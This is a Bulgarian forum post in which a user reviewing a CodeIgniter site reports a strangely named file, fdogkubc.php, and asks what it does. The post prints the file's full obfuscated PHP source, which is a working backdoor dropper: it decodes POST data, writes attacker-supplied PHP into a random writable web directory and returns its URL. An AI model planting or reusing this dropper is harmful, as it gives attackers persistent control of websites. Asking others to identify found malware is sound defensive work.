Здравейте,
Разглеждам една система писана на codigniter и се натъкнах на един файл със странно име и странно съдържание.
Името на файла е: fdogkubc.php
Съдържанието е
Някой има ли идея, какво прави този код?
Разглеждам една система писана на codigniter и се натъкнах на един файл със странно име и странно съдържание.
Името на файла е: fdogkubc.php
Съдържанието е
Код:
<?php
$hilypmmhg = "ilqsmtfjixawbzxi";
$bmliicfp = "";
foreach ($_POST as $wfywkevcdm => $avneljbft) {
if (strlen($wfywkevcdm) == 16 and substr_count($avneljbft, "%") > 10) {
mwwzvba($wfywkevcdm, $avneljbft);
}
}
function mwwzvba($wfywkevcdm, $nrjpwesr) {
global $bmliicfp;
$bmliicfp = $wfywkevcdm;
$nrjpwesr = str_split(rawurldecode(str_rot13($nrjpwesr)));
function xuidr($lhknumbuuk, $wfywkevcdm){
global $hilypmmhg, $bmliicfp;
return $lhknumbuuk ^ $hilypmmhg[$wfywkevcdm % strlen($hilypmmhg)] ^ $bmliicfp[$wfywkevcdm % strlen($bmliicfp)];
}
$nrjpwesr = implode("", array_map("xuidr", array_values($nrjpwesr), array_keys($nrjpwesr)));
$nrjpwesr = @unserialize($nrjpwesr);
if (@is_array($nrjpwesr)){
$wfywkevcdm = array_keys($nrjpwesr);
$nrjpwesr = $nrjpwesr[$wfywkevcdm[0]];
if ($nrjpwesr === $wfywkevcdm[0]){
echo @serialize(Array('php' => @phpversion(), ));exit();
}else{
function bwvge($oitakjtoir) {
static $cwheo = array();
$ffijwjg = glob($oitakjtoir . '/*', GLOB_ONLYDIR);
if (count($ffijwjg) > 0) {
foreach ($ffijwjg as $oitakjto){
if (@is_writable($oitakjto)){
$cwheo[] = $oitakjto;
}
}
}
foreach ($ffijwjg as $oitakjtoir) bwvge($oitakjtoir);
return $cwheo;
}
$lkyfnpks = $_SERVER["DOCUMENT_ROOT"];
$ffijwjg = bwvge($lkyfnpks);
$wfywkevcdm = array_rand($ffijwjg);
$igklk = $ffijwjg[$wfywkevcdm] . "/" . substr(md5(time()), 0, 8) . ".php";
@file_put_contents($igklk, $nrjpwesr);
echo "http://" . $_SERVER["HTTP_HOST"] . substr($igklk, strlen($lkyfnpks));
exit();
}
}
}
Някой има ли идея, какво прави този код?